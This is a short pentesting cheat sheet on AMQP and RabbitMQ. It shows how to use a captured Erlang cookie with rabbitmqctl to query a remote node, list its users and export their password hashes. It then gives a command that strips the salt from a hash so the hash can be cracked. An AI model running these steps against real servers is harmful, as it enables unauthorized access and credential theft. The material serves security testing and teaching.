# AMQP (Advanced Message Queuing Protocol)

## AMQP (Advanced Message Queuing Protocol) <a href="#amqp-advanced-message-queuing-protocol" id="amqp-advanced-message-queuing-protocol"></a>

AMQP is an open standard application layer protocol. Defaults Ports are 5671, 5672.

### Connect <a href="#connect" id="connect"></a>

We can use `rabbitmqctl` command for interacting with the AMQP server from remote machine.\
If it does not exist on your machine, install it with the following command:

```shellscript
sudo apt install rabbitmq-server
```

Now we can use it.

```shellscript
# Get status
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> status

# Get all users
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> list_users

# Dump user password hash (format: Base64 encoded RabbitMQ SHA-256)
sudo rabbitmqctl --erlang-cookie "abcde..." --node rabbit@<target-hostname> export_definitions /tmp/output.json
```

### Get Password <a href="#get-password" id="get-password"></a>

If we get the password hash after the `rabbitmqctl export_definitions` command, we can extract the password from it. The hash is Base64-encoded and the format is as below by default:

```shellscript
BASE64(4_BYTE_SALT + SHA256(4_BYTE_SALT + PASSWORD))
```

So extract the SHA256 hash with the following command:

```shellscript
# cut -c9-: Output from the 9th character (to extract the first 4 bytes)
echo -n '<password_hash>' | base64 -d | xxd -p -c 1000 | cut -c9-
```